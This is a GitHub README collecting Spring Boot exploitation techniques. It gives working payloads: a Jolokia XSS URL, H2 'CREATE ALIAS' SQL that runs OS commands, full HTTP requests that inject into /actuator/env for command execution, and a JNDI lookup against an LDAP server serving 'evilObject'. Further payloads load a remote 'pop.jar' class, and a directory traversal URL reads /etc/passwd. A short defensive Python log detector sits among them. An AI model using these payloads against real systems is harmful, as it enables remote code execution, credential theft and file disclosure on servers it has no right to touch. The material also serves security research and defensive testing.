https://github.com/pyn3rd/Spring-Boot-Vulnerability
- Host: GitHub
- URL: https://github.com/pyn3rd/Spring-Boot-Vulnerability
- Owner: pyn3rd
- Created: 2020-08-06T03:29:18.000Z (about 5 years ago)
- Default Branch: master
- Last Pushed: 2022-01-05T03:18:27.000Z (almost 4 years ago)
- Last Synced: 2024-11-21T12:44:55.326Z (12 months ago)
- Size: 6.15 MB
- Stars: 398
- Watchers: 16
- Forks: 56
- Open Issues: 0
- Metadata Files: README.md
README

# Spring Boot Vulnerability (Keep On Updating)
### 0x01 Spring Boot Actuator Exposed
Actuator endpoints allow you to monitor and interact with your Spring application. Spring Boot includes a number of built-in endpoints and you can also add your own. For example, the health endpoint provides basic application health information. The following endpoints are available:
* ##### /autoconfig - Displays an auto-configuration report showing all auto-configuration candidates and the reason why they 'were' or 'were not' applied.
* ##### /beans - Displays a complete list of all the Spring beans in your application.
* ##### /configprops - Displays a collated list of all @ConfigurationProperties.
* ##### /dump - Performs a thread dump.
* ##### /heapdump - Returns a JVM heap dump. It is a binary file; you can analyze it with the tool ``MemoryAnalyzer``. The dump may contain ``PASSWORD / ACCESS_KEY / COOKIES / ACCESS_TOKEN`` or other sensitive information.
* ##### /env - Exposes properties from Spring's ConfigurableEnvironment.
* ##### /health - Shows application health information (a simple 'status' when accessed over an unauthenticated connection, or full message details when authenticated).
* ##### /info - Displays arbitrary application info.
* ##### /metrics - Shows 'metrics' information for the current application.
* ##### /mappings - Displays a collated list of all @RequestMapping paths.
* ##### /shutdown - Allows the application to be gracefully shut down (not enabled by default).
* ##### /pause - Allows the application to be gracefully paused (not enabled by default).
* ##### /resume - Allows the application to be gracefully resumed (not enabled by default).
* ##### /trace - Displays trace information (by default the last few HTTP requests).
  
  
### 0x02 Spring Boot RCE/XSS involving Jolokia
#### 0x001 Jolokia RCE
#### 0x002 Jolokia XSS fixed since Jolokia ``1.5.0`` (CVE-2018-1000129)
pom.xml
```
<dependency>
    <groupId>org.jolokia</groupId>
    <artifactId>jolokia-core</artifactId>
    <version>1.4.0</version>
</dependency>
```
When visiting the URL ``http://127.0.0.1:10090/actuator/jolokia/read%3Csvg%20onload=alert('xss')%3E?mimeType=text/html``

### 0x03 Spring Boot RCE involving H2 Database JNDI Injection
pom.xml
```
<dependency>
    <groupId>org.springframework.boot</groupId>
    <artifactId>spring-boot-starter-data-jpa</artifactId>
    <version>2.2.6.RELEASE</version>
</dependency>
<dependency>
    <groupId>com.h2database</groupId>
    <artifactId>h2</artifactId>
    <scope>runtime</scope>
    <version>1.4.2</version>
</dependency>
```
application.properties
```
spring.h2.console.enabled=true
spring.h2.console.settings.web-allow-others=true
```
You can visit ``/actuator/env`` to confirm that the ``H2 Console`` is enabled.

##### Example 1: Execute ``open -a Calculator`` Command

### 0x04 Spring Boot RCE involving H2 Database ``ALIAS`` Command

##### Example 1: Execute ``id`` Command
```
CREATE ALIAS EXECMD AS $$ String execmd(String cmd) throws java.io.IOException { java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A"); return s.hasNext() ? s.next() : "";  }$$;
CALL EXECMD('id')
```
##### Example 2: Execute ``open -a Calculator`` Command
```
CREATE ALIAS EXECMD AS $$ String execmd(String cmd) throws java.io.IOException { Runtime.getRuntime().exec(cmd);return null; }$$;
CALL EXECMD('open -a Calculator');
```

### 0x05 Spring Boot RCE involving JMX enabled
When visiting the URL ``http://127.0.0.1:10090/actuator/env/spring.jmx.enabled``, you will find that JMX is enabled.

##### Example 1: Execute ``open -a Calculator`` Command

### 0x06 Spring Boot RCE involving H2 Database 
#### 0x001 Remote Code Execution via ``spring.datasource.hikari.connection-test-query`` or ``spring.datasource.hikari.connection-init-sql``
##### Example 1: ``spring.datasource.hikari.connection-init-sql``
Step 1:
```
POST /actuator/env HTTP/1.1
Host: 127.0.0.1:10090
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/json
Content-Length: 280

{"sourceType": "com.zaxxer.hikari.HikariDataSource","name":"spring.datasource.hikari.connection-init-sql","value":"CREATE ALIAS EXECMD AS $$ String execmd(String cmd) throws java.io.IOException { Runtime.getRuntime().exec(cmd);return null; }$$;CALL EXECMD('open -a Calculator');"}
```
Step 2:
```
POST /actuator/restart HTTP/1.1
```
#### 0x002 JNDI Injection

Step 1:
```
POST /actuator/env HTTP/1.1
Host: 127.0.0.1:10090
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Content-Type: application/json
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,ja;q=0.7,fr;q=0.6
Connection: close
Content-Length: 320

{
  "name": "spring.datasource.hikari.connection-init-sql",
  "value": "CREATE ALIAS jndi AS $$ import javax.naming.InitialContext;@CODE String jndi(String url) throws Exception {new InitialContext().lookup(url);return null;}$$;CALL jndi('ldap://127.0.0.1:1389/evilObject');"
}
```
Step 2:
```
POST /actuator/restart HTTP/1.1
```
#### 0x003 URL Classloader

Step 1:
```
POST /actuator/env HTTP/1.1
Host: 127.0.0.1:10090
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Content-Type: application/json
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,ja;q=0.7,fr;q=0.6
Connection: close
Content-Length: 320

{
  "name": "spring.datasource.hikari.connection-init-sql",
  "value": "CREATE ALIAS remoteUrl AS $$ import java.net.*;@CODE String remoteUrl() throws Exception { Class.forName (\"pop\", true, new URLClassLoader(new URL[]{new URL(\"http://127.0.0.1:9001/pop.jar\")})).newInstance();return null;}$$;CALL remoteUrl()"
}
```
Step 2:
```
POST /actuator/restart HTTP/1.1
```
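As an added defender-side example (not part of the README), the following Python check runs over constructed access-log lines and flags the sensitive actuator endpoints listed in 0x01 as well as the env-modify-then-restart sequence used in 0x06. The common-log-format layout, the sample lines and the findings tuple shape are assumptions.

```python
import re

# Constructed sample access-log lines (common log format); not from the page.
SAMPLE_LOG = """\
10.0.0.5 - - [05/Jan/2022:10:00:01 +0000] "GET /actuator/health HTTP/1.1" 200 15
10.0.0.9 - - [05/Jan/2022:10:00:02 +0000] "GET /actuator/heapdump HTTP/1.1" 200 5242880
10.0.0.9 - - [05/Jan/2022:10:00:05 +0000] "POST /actuator/env HTTP/1.1" 200 0
10.0.0.9 - - [05/Jan/2022:10:00:06 +0000] "POST /actuator/restart HTTP/1.1" 200 0
10.0.0.7 - - [05/Jan/2022:10:00:09 +0000] "GET /actuator/jolokia/read%3Csvg%20onload=alert('xss')%3E?mimeType=text/html HTTP/1.1" 200 120
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Actuator endpoints from the README that leak secrets or change application state
SENSITIVE = {"heapdump", "env", "dump", "trace", "beans", "configprops",
             "jolokia", "restart", "shutdown"}


def parse(line):
    """Return the ip/method/path/status fields of one log line, or None."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def endpoint_of(path):
    """Strip the query string and the /actuator prefix, keep the first segment."""
    parts = [p for p in path.split("?", 1)[0].split("/") if p]
    if parts and parts[0] == "actuator":
        parts = parts[1:]
    return parts[0] if parts else ""


def detect(log_text):
    """Return (ip, finding, endpoint) tuples for successful (2xx) suspicious requests."""
    findings = []
    env_written = set()  # clients that have POSTed to /actuator/env
    for line in log_text.splitlines():
        rec = parse(line)
        if not rec or not rec["status"].startswith("2"):
            continue
        ep = endpoint_of(rec["path"])
        if ep in SENSITIVE:
            findings.append((rec["ip"], "sensitive_endpoint", ep))
        if rec["method"] == "POST" and ep == "env":
            env_written.add(rec["ip"])
        elif rec["method"] == "POST" and ep == "restart" and rec["ip"] in env_written:
            findings.append((rec["ip"], "env_write_then_restart", ep))
    return findings
```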
### 0x07 Spring Boot RCE involving MyBatis (CVE-2020-26945)

### 0x08 Spring Boot Actuator Logview Directory Traversal (CVE-2021-21234)

#### Set Breakpoint At ``securityCheck()``


#### Construct Directory Traversal Request URL
``http://localhost:8887/manage/log/view?filename=/etc/passwd&base=../../../../../``
#### Step Into

#### Step Into
``spring.log/../../../../../`` is taken as the folder, and ``/etc/passwd`` is the file we want

#### Step Into
In toFile(), the folder ``spring.log/../../../../../`` and the file ``/etc/passwd`` will be concatenated into a path without ``securityCheck()``

#### Retrieve the content of file ``/etc/passwd``


### 0x09 Spring Boot Log4j2 JNDI Injection